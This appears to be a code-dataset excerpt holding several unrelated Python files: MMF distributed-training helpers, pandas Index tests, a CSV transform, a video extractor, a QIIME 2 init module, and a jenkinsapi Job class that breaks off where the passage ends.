ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 1a343963fe9034a55928eff59c24558d349b8f84 | # Copyright (c) Facebook, Inc. and its affiliates.
# Inspired from maskrcnn_benchmark, fairseq
import logging
import os
import pickle
import socket
import subprocess
import warnings
import torch
from mmf.common.registry import registry
from torch import distributed as dist
try:
import torch_xla.core.xla_model as xm
except ImportError:
xm = None
MAX_SIZE_LIMIT = 65533
BYTE_SIZE = 256
logger = logging.getLogger(__name__)
# copied from https://github.com/facebookresearch/vissl/blob/master/vissl/utils/distributed_gradients.py
class GatherLayer(torch.autograd.Function):
"""
Gather tensors from all workers with support for backward propagation:
This implementation does not cut the gradients as torch.distributed.all_gather does.
"""
@staticmethod
def forward(ctx, x):
output = [torch.zeros_like(x) for _ in range(dist.get_world_size())]
dist.all_gather(output, x)
return tuple(output)
@staticmethod
def backward(ctx, *grads):
all_gradients = torch.stack(grads)
dist.all_reduce(all_gradients)
return all_gradients[dist.get_rank()]
class XLAGatherLayer(torch.autograd.Function):
"""
Gather tensors from all TPU workers with support for backward propagation.
"""
@staticmethod
def forward(ctx, x, dim):
ctx.dim = dim
tensor_list = xm.all_gather(x.unsqueeze(dim), dim=dim)
return tensor_list
@staticmethod
def backward(ctx, grad_output):
dim = ctx.dim
all_grad_output = xm.all_reduce(xm.REDUCE_SUM, grad_output)
return all_grad_output.select(dim, xm.get_ordinal()), None
def synchronize(message="sync-workers"):
if is_xla():
xm.rendezvous(message)
elif not dist.is_available():
return
if not dist.is_nccl_available():
return
if not dist.is_initialized():
return
world_size = dist.get_world_size()
if world_size == 1:
return
dist.barrier()
def is_xla():
# Cover none case as well
return not (not registry.get("is_xla", no_warning=True))
def get_rank():
if is_xla():
return xm.get_ordinal()
if not dist.is_available():
return 0
if not dist.is_nccl_available():
return 0
if not dist.is_initialized():
return 0
return dist.get_rank()
def is_master():
return get_rank() == 0
def is_dist_initialized():
return dist.is_available() and dist.is_initialized()
def get_world_size():
if is_xla():
return xm.xrt_world_size()
if not dist.is_available():
return 1
if not dist.is_nccl_available():
return 1
if not dist.is_initialized():
return 1
return dist.get_world_size()
def broadcast_tensor(tensor, src=0):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
if is_xla():
tensor = xm.all_to_all(
tensor.repeat([world_size, 1]),
split_dimension=0,
concat_dimension=0,
split_count=world_size,
)[0]
else:
dist.broadcast(tensor, src=0)
return tensor
def broadcast_scalar(scalar, src=0, device="cpu"):
if get_world_size() < 2:
return scalar
scalar_tensor = torch.tensor(scalar).long().to(device)
scalar_tensor = broadcast_tensor(scalar_tensor, src)
return scalar_tensor.item()
def reduce_tensor(tensor):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
dist.reduce(tensor, dst=0)
if dist.get_rank() == 0:
tensor = tensor.div(world_size)
return tensor
def gather_tensor(tensor):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
tensor_list = []
for _ in range(world_size):
tensor_list.append(torch.zeros_like(tensor))
if is_xla():
tensor_list = xm.all_gather(tensor)
tensor_list = tensor_list.view(world_size, *tensor.size())
else:
dist.all_gather(tensor_list, tensor)
tensor_list = torch.stack(tensor_list, dim=0)
return tensor_list
def gather_tensor_along_batch(tensor, dim=0):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
tensor_list = []
for _ in range(world_size):
tensor_list.append(torch.zeros_like(tensor))
dist.all_gather(tensor_list, tensor)
tensor_list = torch.cat(tensor_list, dim=dim)
return tensor_list
def gather_tensor_along_batch_with_backward(tensor, dim=0):
world_size = get_world_size()
if world_size < 2:
return tensor
if is_xla():
tensor_list = XLAGatherLayer.apply(tensor, dim)
tensor_list = tensor_list.flatten(start_dim=dim, end_dim=dim + 1)
else:
tensor_list = GatherLayer.apply(tensor)
tensor_list = torch.cat(tensor_list, dim=dim)
return tensor_list
def reduce_dict(dictionary):
world_size = get_world_size()
if world_size < 2:
return dictionary
with torch.no_grad():
if len(dictionary) == 0:
return dictionary
keys, values = zip(*sorted(dictionary.items()))
values = torch.stack(values, dim=0)
if is_xla():
values = xm.all_reduce("sum", [values], scale=1.0 / world_size)[0]
else:
dist.reduce(values, dst=0)
if dist.get_rank() == 0:
# only main process gets accumulated, so only divide by
# world_size in this case
values /= world_size
reduced_dict = {k: v for k, v in zip(keys, values)}
return reduced_dict
# Object byte tensor utilities have been adopted from
# https://github.com/pytorch/fairseq/blob/master/fairseq/distributed_utils.py
def object_to_byte_tensor(obj, max_size=4094):
"""
Encode Python objects to PyTorch byte tensors
"""
assert max_size <= MAX_SIZE_LIMIT
byte_tensor = torch.zeros(max_size, dtype=torch.uint8)
obj_enc = pickle.dumps(obj)
obj_size = len(obj_enc)
if obj_size > max_size:
raise Exception(
f"objects too large: object size {obj_size}, max size {max_size}"
)
byte_tensor[0] = obj_size // 256
byte_tensor[1] = obj_size % 256
byte_tensor[2 : 2 + obj_size] = torch.ByteTensor(list(obj_enc))
return byte_tensor
def byte_tensor_to_object(byte_tensor, max_size=MAX_SIZE_LIMIT):
"""
Decode PyTorch byte tensors to Python objects
"""
assert max_size <= MAX_SIZE_LIMIT
obj_size = byte_tensor[0].item() * 256 + byte_tensor[1].item()
obj_enc = bytes(byte_tensor[2 : 2 + obj_size].tolist())
obj = pickle.loads(obj_enc)
return obj
def infer_init_method(config):
if config.distributed.init_method is not None:
return
registry.register("is_xla", config.training.get("device", "cuda") == "xla")
# support torch.distributed.launch
if all(
key in os.environ
for key in ["MASTER_ADDR", "MASTER_PORT", "WORLD_SIZE", "RANK"]
):
config.distributed.init_method = "env://"
config.distributed.world_size = int(os.environ["WORLD_SIZE"])
config.distributed.rank = int(os.environ["RANK"])
config.distributed.no_spawn = True
# we can determine the init method automatically for Slurm
elif config.distributed.port > 0:
node_list = os.environ.get("SLURM_STEP_NODELIST")
if node_list is None:
node_list = os.environ.get("SLURM_JOB_NODELIST")
if node_list is not None:
try:
hostnames = subprocess.check_output(
["scontrol", "show", "hostnames", node_list]
)
config.distributed.init_method = "tcp://{host}:{port}".format(
host=hostnames.split()[0].decode("utf-8"),
port=config.distributed.port,
)
nnodes = int(os.environ.get("SLURM_NNODES"))
ntasks_per_node = os.environ.get("SLURM_NTASKS_PER_NODE")
if ntasks_per_node is not None:
ntasks_per_node = int(ntasks_per_node)
else:
ntasks = int(os.environ.get("SLURM_NTASKS"))
nnodes = int(os.environ.get("SLURM_NNODES"))
assert ntasks % nnodes == 0
ntasks_per_node = int(ntasks / nnodes)
if ntasks_per_node == 1:
assert config.distributed.world_size % nnodes == 0
gpus_per_node = config.distributed.world_size // nnodes
node_id = int(os.environ.get("SLURM_NODEID"))
config.distributed.rank = node_id * gpus_per_node
else:
assert ntasks_per_node == config.distributed.world_size // nnodes
config.distributed.no_spawn = True
config.distributed.rank = int(os.environ.get("SLURM_PROCID"))
config.device_id = int(os.environ.get("SLURM_LOCALID"))
except subprocess.CalledProcessError as e: # scontrol failed
raise e
except FileNotFoundError: # Slurm is not installed
pass
def distributed_init(config):
if config.distributed.world_size == 1:
raise ValueError("Cannot initialize distributed with distributed_world_size=1")
logger.info(f"XLA Mode:{is_xla()}")
if is_xla():
config.device_id = xm.get_local_ordinal()
config.distributed.rank = xm.get_ordinal()
elif dist.is_initialized():
warnings.warn("Distributed is already initialized, cannot initialize twice!")
config.distributed.rank = dist.get_rank()
else:
logger.info(
f"Distributed Init (Rank {config.distributed.rank}): "
f"{config.distributed.init_method}"
)
dist.init_process_group(
backend=config.distributed.backend,
init_method=config.distributed.init_method,
world_size=config.distributed.world_size,
rank=config.distributed.rank,
)
logger.info(
f"Initialized Host {socket.gethostname()} as Rank "
f"{config.distributed.rank}"
)
if "MASTER_ADDR" not in os.environ or "MASTER_PORT" not in os.environ:
# Set for onboxdataloader support
split = config.distributed.init_method.split("//")
assert len(split) == 2, (
"host url for distributed should be split by '//' "
+ "into exactly two elements"
)
split = split[1].split(":")
assert (
len(split) == 2
), "host url should be of the form <host_url>:<host_port>"
os.environ["MASTER_ADDR"] = split[0]
os.environ["MASTER_PORT"] = split[1]
# perform a dummy all-reduce to initialize the NCCL communicator
dist.all_reduce(torch.zeros(1).cuda())
suppress_output(is_master())
config.distributed.rank = dist.get_rank()
return config.distributed.rank
def suppress_output(is_master):
"""Suppress printing on the current device. Force printing with `force=True`."""
import builtins as __builtin__
builtin_print = __builtin__.print
def print(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
import warnings
builtin_warn = warnings.warn
def warn(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_warn(*args, **kwargs)
# Log warnings only once
warnings.warn = warn
warnings.simplefilter("once", UserWarning)
|
py | 1a343a5b589b165da79af523abb640047da78538 | """
Tests for ndarray-like method on the base Index class
"""
import pytest
import pandas as pd
from pandas import Index
import pandas._testing as tm
class TestReshape:
def test_repeat(self):
repeats = 2
index = pd.Index([1, 2, 3])
expected = pd.Index([1, 1, 2, 2, 3, 3])
result = index.repeat(repeats)
tm.assert_index_equal(result, expected)
def test_insert(self):
# GH 7256
# validate neg/pos inserts
result = Index(["b", "c", "d"])
# test 0th element
tm.assert_index_equal(Index(["a", "b", "c", "d"]), result.insert(0, "a"))
# test Nth element that follows Python list behavior
tm.assert_index_equal(Index(["b", "c", "e", "d"]), result.insert(-1, "e"))
# test loc +/- neq (0, -1)
tm.assert_index_equal(result.insert(1, "z"), result.insert(-2, "z"))
# test empty
null_index = Index([])
tm.assert_index_equal(Index(["a"]), null_index.insert(0, "a"))
@pytest.mark.parametrize(
"pos,expected",
[
(0, Index(["b", "c", "d"], name="index")),
(-1, Index(["a", "b", "c"], name="index")),
],
)
def test_delete(self, pos, expected):
index = Index(["a", "b", "c", "d"], name="index")
result = index.delete(pos)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
def test_append_multiple(self):
index = Index(["a", "b", "c", "d", "e", "f"])
foos = [index[:2], index[2:4], index[4:]]
result = foos[0].append(foos[1:])
tm.assert_index_equal(result, index)
# empty
result = index.append([])
tm.assert_index_equal(result, index)
|
py | 1a343bc3baa09a251c059c56784341a4035dc5f4 | from datetime import datetime
from os import listdir
import pandas
from application_logging.logger import App_Logger
class dataTransformPredict:
def __init__(self):
self.goodDataPath = "Prediction_Raw_Files_Validated/Good_Raw"
self.logger = App_Logger()
def replaceMissingWithNull(self):
try:
log_file = open("Prediction_Logs/dataTransformLog.txt", 'a+')
onlyfiles = [f for f in listdir(self.goodDataPath)]
for file in onlyfiles:
data = pandas.read_csv(self.goodDataPath + "/" + file)
# list of columns with string datatype variables
columns = ["policy_bind_date","policy_state","policy_csl","insured_sex","insured_education_level","insured_occupation","insured_hobbies","insured_relationship","incident_state","incident_date","incident_type","collision_type","incident_severity","authorities_contacted","incident_city","incident_location","property_damage","police_report_available","auto_make","auto_model"]
for col in columns:
data[col] = data[col].apply(lambda x: "'" + str(x) + "'")
# #csv.update("'"+ csv['Wafer'] +"'")
# csv.update(csv['Wafer'].astype(str))
#csv['Wafer'] = csv['Wafer'].str[6:]
data.to_csv(self.goodDataPath+ "/" + file, index=None, header=True)
self.logger.log(log_file," %s: File Transformed successfully!!" % file)
#log_file.write("Current Date :: %s" %date +"\t" + "Current time:: %s" % current_time + "\t \t" + + "\n")
except Exception as e:
self.logger.log(log_file, "Data Transformation failed because:: %s" % e)
#log_file.write("Current Date :: %s" %date +"\t" +"Current time:: %s" % current_time + "\t \t" + "Data Transformation failed because:: %s" % e + "\n")
log_file.close()
raise e
log_file.close()
|
py | 1a343c34350f4c36bed2b3b475a503790c350013 | from __future__ import unicode_literals
from .common import InfoExtractor
class DefenseGouvFrIE(InfoExtractor):
IE_NAME = "defense.gouv.fr"
_VALID_URL = r"https?://.*?\.defense\.gouv\.fr/layout/set/ligthboxvideo/base-de-medias/webtv/(?P<id>[^/?#]*)"
_TEST = {
"url": "http://www.defense.gouv.fr/layout/set/ligthboxvideo/base-de-medias/webtv/attaque-chimique-syrienne-du-21-aout-2013-1",
"md5": "75bba6124da7e63d2d60b5244ec9430c",
"info_dict": {
"id": "11213",
"ext": "mp4",
"title": "attaque-chimique-syrienne-du-21-aout-2013-1",
},
}
def _real_extract(self, url):
title = self._match_id(url)
webpage = self._download_webpage(url, title)
video_id = self._search_regex(r"flashvars.pvg_id=\"(\d+)\";", webpage, "ID")
json_url = (
"http://static.videos.gouv.fr/brightcovehub/export/json/%s" % video_id
)
info = self._download_json(json_url, title, "Downloading JSON config")
video_url = info["renditions"][0]["url"]
return {
"id": video_id,
"ext": "mp4",
"url": video_url,
"title": title,
}
|
py | 1a343d63d399f02e67c2da6969d5fcfa5c39c386 | import sys
def get_default_python_version():
return "{major}.{minor}.0".format(
major=sys.version_info.major,
minor=sys.version_info.minor
)
|
py | 1a343d8f2eea5a1329f3ffa66946640cb015fe6c | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2017, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from ._alpha import (alpha, alpha_phylogenetic, alpha_group_significance,
alpha_correlation)
from ._beta import (beta, beta_phylogenetic, bioenv, beta_group_significance,
beta_correlation)
from ._ordination import pcoa
from ._core_metrics import core_metrics
from ._filter import filter_distance_matrix
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__all__ = ['beta', 'beta_phylogenetic', 'alpha', 'alpha_phylogenetic', 'pcoa',
'alpha_group_significance', 'bioenv', 'beta_group_significance',
'alpha_correlation', 'core_metrics', 'filter_distance_matrix',
'beta_correlation']
|
py | 1a343f441b615c002c32994f8ebfee165c076054 | """
Module for jenkinsapi Job
"""
import json
import logging
import xml.etree.ElementTree as ET
import six.moves.urllib.parse as urlparse
from collections import defaultdict
from jenkinsapi.build import Build
from jenkinsapi.custom_exceptions import (
NoBuildData,
NotConfiguredSCM,
NotFound,
NotInQueue,
NotSupportSCM,
UnknownQueueItem,
BadParams,
)
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.mutable_jenkins_thing import MutableJenkinsThing
from jenkinsapi.queue import QueueItem
from jenkinsapi_utils.compat import to_string
SVN_URL = './scm/locations/hudson.scm.SubversionSCM_-ModuleLocation/remote'
GIT_URL = './scm/userRemoteConfigs/hudson.plugins.git.UserRemoteConfig/url'
HG_URL = './scm/source'
GIT_BRANCH = './scm/branches/hudson.plugins.git.BranchSpec/name'
HG_BRANCH = './scm/branch'
DEFAULT_HG_BRANCH_NAME = 'default'
log = logging.getLogger(__name__)
class Job(JenkinsBase, MutableJenkinsThing):
"""
Represents a jenkins job
A job can hold N builds which are the actual execution environments
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins = jenkins_obj
self._revmap = None
self._config = None
self._element_tree = None
self._scm_prefix = ""
self._scm_map = {
'hudson.scm.SubversionSCM': 'svn',
'hudson.plugins.git.GitSCM': 'git',
'hudson.plugins.mercurial.MercurialSCM': 'hg',
'hudson.scm.NullSCM': 'NullSCM'
}
self._scmurlmap = {
'svn': lambda element_tree: list(element_tree.findall(SVN_URL)),
'git': lambda element_tree: list(element_tree.findall(self._scm_prefix + GIT_URL)),
'hg': lambda element_tree: list(element_tree.findall(HG_URL)),
None: lambda element_tree: []
}
self._scmbranchmap = {
'svn': lambda element_tree: [],
'git': lambda element_tree: list(element_tree.findall(self._scm_prefix + GIT_BRANCH)),
'hg': self._get_hg_branch,
None: lambda element_tree: []
}
self.url = url
JenkinsBase.__init__(self, self.url)
def __str__(self):
return self.name
def get_description(self):
return self._data["description"]
def get_jenkins_obj(self):
return self.jenkins
# When the name of the hg branch used in the job is default hg branch (i.e.
# default), Mercurial plugin doesn't store default branch name in
# config XML file of the job. Create XML node corresponding to
# default branch
def _get_hg_branch(self, element_tree):
branches = element_tree.findall(HG_BRANCH)
if not branches:
hg_default_branch = ET.Element('branch')
hg_default_branch.text = DEFAULT_HG_BRANCH_NAME
branches.append(hg_default_branch)
return branches
def poll(self, tree=None):
data = super(Job, self).poll(tree=tree)
if not tree and not self.jenkins.lazy:
self._data = self._add_missing_builds(self._data)
return data
# pylint: disable=E1123
# Unexpected keyword arg 'params'
def _add_missing_builds(self, data):
"""
Query Jenkins to get all builds of the job in the data object.
Jenkins API loads the first 100 builds and thus may not contain
all builds information. This method checks if all builds are loaded
in the data object and updates it with the missing builds if needed.
"""
if not data.get("builds"):
return data
# do not call _buildid_for_type here: it would poll and do an infinite
# loop
oldest_loaded_build_number = data["builds"][-1]["number"]
if 'firstBuild' not in self._data or not self._data['firstBuild']:
first_build_number = oldest_loaded_build_number
else:
first_build_number = self._data["firstBuild"]["number"]
all_builds_loaded = (oldest_loaded_build_number == first_build_number)
if all_builds_loaded:
return data
response = self.poll(tree='allBuilds[number,url]')
data['builds'] = response['allBuilds']
return data
def _get_config_element_tree(self):
"""
The ElementTree objects creation is unnecessary, it can be
a singleton per job
"""
if self._config is None:
self.load_config()
if self._element_tree is None:
self._element_tree = ET.fromstring(self._config)
return self._element_tree
def get_build_triggerurl(self):
if not self.has_params():
return "%s/build" % self.baseurl
return "%s/buildWithParameters" % self.baseurl
@staticmethod
def _mk_json_from_build_parameters(build_params, file_params=None):
"""
Build parameters must be submitted in a particular format
Key-Value pairs would be far too simple, no no!
Watch and read on and behold!
"""
if not isinstance(build_params, dict):
raise ValueError('Build parameters must be a dict')
build_p = [{'name': k, 'value': to_string(v)}
for k, v in sorted(build_params.items())]
out = {'parameter': build_p}
if file_params:
file_p = [{'name': k, 'file': k}
for k in file_params.keys()]
out['parameter'].extend(file_p)
if len(out['parameter']) == 1:
out['parameter'] = out['parameter'][0]
return out
@staticmethod
def mk_json_from_build_parameters(build_params, file_params=None):
json_structure = Job._mk_json_from_build_parameters(
build_params,
file_params
)
json_structure['statusCode'] = "303"
json_structure['redirectTo'] = "."
return json.dumps(json_structure)
def invoke(self, securitytoken=None, block=False,
build_params=None, cause=None, files=None, delay=5):
assert isinstance(block, bool)
if build_params and (not self.has_params()):
raise BadParams("This job does not support parameters")
params = {} # Via Get string
if securitytoken:
params['token'] = securitytoken
# Either copy the params dict or make a new one.
build_params = dict(build_params.items()) \
if build_params else {} # Via POSTed JSON
url = self.get_build_triggerurl()
if cause:
build_params['cause'] = cause
# Build require params as form fields
# and as Json.
data = {
'json': self.mk_json_from_build_parameters(
build_params,
files)
}
data.update(build_params)
response = self.jenkins.requester.post_and_confirm_status(
url,
data=data,
params=params,
files=files,
valid=[200, 201, 303],
allow_redirects=False
)
redirect_url = response.headers['location']
#
# Enterprise Jenkins implementations such as CloudBees locate their
# queue REST API base https://server.domain.com/jenkins/queue/api/
# above the team-specific REST API base
# https://server.domain.com/jenkins/job/my_team/api/
#
queue_baseurl_candidates = [self.jenkins.baseurl]
scheme, netloc, path, _, query, frag = \
urlparse.urlparse(self.jenkins.baseurl)
while path:
path = '/'.join(path.rstrip('/').split('/')[:-1])
queue_baseurl_candidates.append(
urlparse.urlunsplit([scheme, netloc, path, query, frag]))
redirect_url_valid = False
for queue_baseurl_candidate in queue_baseurl_candidates:
redirect_url_valid = redirect_url.startswith(
"%s/queue/item" % queue_baseurl_candidate)
if redirect_url_valid:
break
if not redirect_url_valid:
raise ValueError("Not a Queue URL: %s" % redirect_url)
qi = QueueItem(redirect_url, self.jenkins)
if block:
qi.block_until_complete(delay=delay)
return qi
def _buildid_for_type(self, buildtype):
"""
Gets a buildid for a given type of build
"""
KNOWNBUILDTYPES = [
"lastStableBuild",
"lastSuccessfulBuild",
"lastBuild",
"lastCompletedBuild",
"firstBuild",
"lastFailedBuild"]
assert buildtype in KNOWNBUILDTYPES, ('Unknown build info type: %s'
% buildtype)
data = self.poll(tree='%s[number]' % buildtype)
if not data.get(buildtype):
raise NoBuildData(buildtype)
return data[buildtype]["number"]
def get_first_buildnumber(self):
"""
Get the numerical ID of the first build.
"""
return self._buildid_for_type("firstBuild")
def get_last_stable_buildnumber(self):
"""
Get the numerical ID of the last stable build.
"""
return self._buildid_for_type("lastStableBuild")
def get_last_good_buildnumber(self):
"""
Get the numerical ID of the last good build.
"""
return self._buildid_for_type("lastSuccessfulBuild")
def get_last_failed_buildnumber(self):
"""
Get the numerical ID of the last failed build.
"""
return self._buildid_for_type(buildtype="lastFailedBuild")
def get_last_buildnumber(self):
"""
Get the numerical ID of the last build.
"""
return self._buildid_for_type("lastBuild")
def get_last_completed_buildnumber(self):
"""
Get the numerical ID of the last complete build.
"""
return self._buildid_for_type("lastCompletedBuild")
def get_build_dict(self):
builds = self.poll(tree='builds[number,url]')
if not builds:
raise NoBuildData(repr(self))
builds = self._add_missing_builds(builds)
builds = builds['builds']
last_build = self.poll(tree='lastBuild[number,url]')['lastBuild']
if builds and last_build and \
builds[0]['number'] != last_build['number']:
builds = [last_build] + builds
# FIXME SO how is this supposed to work if build is false-y?
# I don't think that builds *can* be false here, so I don't
# understand the test above.
return dict((build["number"], build["url"]) for build in builds)
def get_build_by_params(self, build_params, order=1):
first_build_number = self.get_first_buildnumber()
last_build_number = self.get_last_buildnumber()
if order != 1 and order != -1:
raise ValueError(
'Direction should be ascending or descending (1/-1)')
for number in range(first_build_number,
last_build_number + 1)[::order]:
build = self.get_build(number)
if build.get_params() == build_params:
return build
raise NoBuildData(
'No build with such params {params}'.format(params=build_params))
def get_revision_dict(self):
"""
Get dictionary of all revisions with a list of buildnumbers (int)
that used that particular revision
"""
revs = defaultdict(list)
if 'builds' not in self._data:
raise NoBuildData(repr(self))
for buildnumber in self.get_build_ids():
revs[self.get_build(buildnumber)
.get_revision()].append(buildnumber)
return revs
def get_build_ids(self):
"""
Return a sorted list of all good builds as ints.
"""
return reversed(sorted(self.get_build_dict().keys()))
def get_next_build_number(self):
"""
Return the next build number that Jenkins will assign.
"""
return self._data.get('nextBuildNumber', 0)
def get_last_stable_build(self):
"""
Get the last stable build
"""
bn = self.get_last_stable_buildnumber()
return self.get_build(bn)
def get_last_good_build(self):
"""
Get the last good build
"""
bn = self.get_last_good_buildnumber()
return self.get_build(bn)
def get_last_build(self):
"""
Get the last build
"""
bn = self.get_last_buildnumber()
return self.get_build(bn)
def get_first_build(self):
bn = self.get_first_buildnumber()
return self.get_build(bn)
def get_last_build_or_none(self):
"""
Get the last build or None if there is no builds
"""
try:
return self.get_last_build()
except NoBuildData:
return None
def get_last_completed_build(self):
"""
Get the last build regardless of status
"""
bn = self.get_last_completed_buildnumber()
return self.get_build(bn)
def get_buildnumber_for_revision(self, revision, refresh=False):
"""
:param revision: subversion revision to look for, int
:param refresh: boolean, whether or not to refresh the
revision -> buildnumber map
:return: list of buildnumbers, [int]
"""
if self.get_scm_type() == 'svn' and not isinstance(revision, int):
revision = int(revision)
if self._revmap is None or refresh:
self._revmap = self.get_revision_dict()
try:
return self._revmap[revision]
except KeyError:
raise NotFound("Couldn't find a build with that revision")
def get_build(self, buildnumber):
assert isinstance(buildnumber, int)
try:
url = self.get_build_dict()[buildnumber]
return Build(url, buildnumber, job=self)
except KeyError:
raise NotFound('Build #%s not found' % buildnumber)
def delete_build(self, build_number):
"""
Remove build
:param int build_number: Build number
:raises NotFound: When build is not found
"""
try:
url = self.get_build_dict()[build_number]
url = "%s/doDelete" % url
self.jenkins.requester.post_and_confirm_status(url, data='')
self.jenkins.poll()
except KeyError:
raise NotFound('Build #%s not found' % build_number)
def get_build_metadata(self, buildnumber):
"""
Get the build metadata for a given build number. For large builds with
tons of tests, this method is faster than get_build by returning less
data.
"""
if not isinstance(buildnumber, int):
raise ValueError('Parameter "buildNumber" must be int')
try:
url = self.get_build_dict()[buildnumber]
return Build(url, buildnumber, job=self, depth=0)
except KeyError:
raise NotFound('Build #%s not found' % buildnumber)
def __delitem__(self, build_number):
self.delete_build(build_number)
def __getitem__(self, buildnumber):
return self.get_build(buildnumber)
def __len__(self):
return len(self.get_build_dict())
def is_queued_or_running(self):
return self.is_queued() or self.is_running()
def is_queued(self):
data = self.poll(tree='inQueue')
return data.get('inQueue', False)
def get_queue_item(self):
"""
Return a QueueItem if this object is in a queue, otherwise raise
an exception
"""
if not self.is_queued():
raise UnknownQueueItem()
q_item = self.poll(tree='queueItem[url]')
qi_url = urlparse.urljoin(
self.jenkins.baseurl, q_item['queueItem']['url']
)
return QueueItem(qi_url, self.jenkins)
def is_running(self):
# self.poll()
try:
build = self.get_last_build_or_none()
if build is not None:
return build.is_running()
except NoBuildData:
log.info(
"No build info available for %s, assuming not running.",
str(self))
return False
def get_config(self):
"""
Returns the config.xml from the job
"""
response = self.jenkins.requester.get_and_confirm_status(
"%(baseurl)s/config.xml" % self.__dict__)
return response.text
def load_config(self):
self._config = self.get_config()
def get_scm_type(self):
element_tree = self._get_config_element_tree()
scm_element = element_tree.find('scm')
if not scm_element:
multibranch_scm_prefix = \
"properties/org.jenkinsci.plugins.workflow.multibranch.BranchJobProperty/branch/"
multibranch_path = multibranch_scm_prefix + "scm"
scm_element = element_tree.find(multibranch_path)
if scm_element:
# multibranch pipeline.
self._scm_prefix = multibranch_scm_prefix
scm_class = scm_element.get('class') if scm_element else None
scm = self._scm_map.get(scm_class)
if not scm:
raise NotSupportSCM(
'SCM class "%s" not supported by API for job "%s"'
% (scm_class, self.name))
if scm == 'NullSCM':
raise NotConfiguredSCM(
'SCM is not configured for job "%s"' % self.name)
return scm
def get_scm_url(self):
"""
Get list of project SCM urls
For some SCM's jenkins allow to configure and use number of SCM url's
: return: list of SCM urls
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_url_list = [scm_url.text for scm_url in self._scmurlmap[
scm](element_tree)]
return scm_url_list
def get_scm_branch(self):
"""
Get list of SCM branches
: return: list of SCM branches
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
return [scm_branch.text
for scm_branch in self._scmbranchmap[scm](element_tree)]
def modify_scm_branch(self, new_branch, old_branch=None):
"""
Modify SCM ("Source Code Management") branch name for configured job.
:param new_branch : new repository branch name to set.
If job has multiple branches configured and "old_branch"
not provided - method will allways modify first url.
:param old_branch (optional): exact value of branch name
to be replaced.
For some SCM's jenkins allow set multiple branches per job
this parameter intended to indicate which branch need to be
modified
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_branch_list = self._scmbranchmap[scm](element_tree)
if scm_branch_list and not old_branch:
scm_branch_list[0].text = new_branch
self.update_config(ET.tostring(element_tree))
else:
for scm_branch in scm_branch_list:
if scm_branch.text == old_branch:
scm_branch.text = new_branch
self.update_config(ET.tostring(element_tree))
def modify_scm_url(self, new_source_url, old_source_url=None):
"""
Modify SCM ("Source Code Management") url for configured job.
:param new_source_url : new repository url to set.
If job has multiple repositories configured and "old_source_url"
not provided - method will allways modify first url.
:param old_source_url (optional): for some SCM's jenkins allows
settting multiple repositories per job
this parameter intended to indicate which repository need
to be modified
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_url_list = self._scmurlmap[scm](element_tree)
if scm_url_list and not old_source_url:
scm_url_list[0].text = new_source_url
self.update_config(ET.tostring(element_tree))
else:
for scm_url in scm_url_list:
if scm_url.text == old_source_url:
scm_url.text = new_source_url
self.update_config(ET.tostring(element_tree))
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def update_config(self, config, full_response=False):
"""
Update the config.xml to the job
Also refresh the ElementTree object since the config has changed
:param full_response (optional): if True, it will return the full
response object instead of just the response text.
Useful for debugging and validation workflows.
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.jenkins.requester.post_url(url, params={}, data=config)
self._element_tree = ET.fromstring(config)
if full_response:
return response
return response.text
def get_downstream_jobs(self):
"""
Get all the possible downstream jobs
:return List of Job
"""
downstream_jobs = []
try:
for j in self._data['downstreamProjects']:
downstream_jobs.append(
self.get_jenkins_obj()[j['name']])
except KeyError:
return []
return downstream_jobs
def get_downstream_job_names(self):
"""
Get all the possible downstream job names
:return List of String
"""
downstream_jobs = []
try:
for j in self._data['downstreamProjects']:
downstream_jobs.append(j['name'])
except KeyError:
return []
return downstream_jobs
def get_upstream_job_names(self):
"""
Get all the possible upstream job names
:return List of String
"""
upstream_jobs = []
try:
for j in self._data['upstreamProjects']:
upstream_jobs.append(j['name'])
except KeyError:
return []
return upstream_jobs
def get_upstream_jobs(self):
"""
Get all the possible upstream jobs
:return List of Job
"""
upstream_jobs = []
try:
for j in self._data['upstreamProjects']:
upstream_jobs.append(self.get_jenkins_obj().get_job(j['name']))
except KeyError:
return []
return upstream_jobs
def is_enabled(self):
data = self.poll(tree='color')
return 'disabled' not in data.get('color', '')
def disable(self):
"""
Disable job
"""
url = "%s/disable" % self.baseurl
return self.get_jenkins_obj().requester.post_url(url, data='')
def enable(self):
"""
Enable job
"""
url = "%s/enable" % self.baseurl
return self.get_jenkins_obj().requester.post_url(url, data='')
def delete_from_queue(self):
"""
Delete a job from the queue only if it's enqueued
:raise NotInQueue if the job is not in the queue
"""
if not self.is_queued():
raise NotInQueue()
queue_id = self._data['queueItem']['id']
url = urlparse.urljoin(self.get_jenkins_obj().get_queue().baseurl,
'queue/cancelItem?id=%s' % queue_id)
self.get_jenkins_obj().requester.post_and_confirm_status(url, data='')
return True
def get_params(self):
"""
Get the parameters for this job. Format varies by parameter type. Here
is an example string parameter:
{
'type': 'StringParameterDefinition',
'description': 'Parameter description',
'defaultParameterValue': {'value': 'default value'},
'name': 'FOO_BAR'
}
"""
places = ['actions', 'property']
found_definitions = False
for place in places:
if found_definitions:
return
actions = (x for x in self._data[place] if x is not None)
for action in actions:
try:
for param in action['parameterDefinitions']:
found_definitions = True
yield param
except KeyError:
continue
def get_params_list(self):
"""
Gets the list of parameter names for this job.
"""
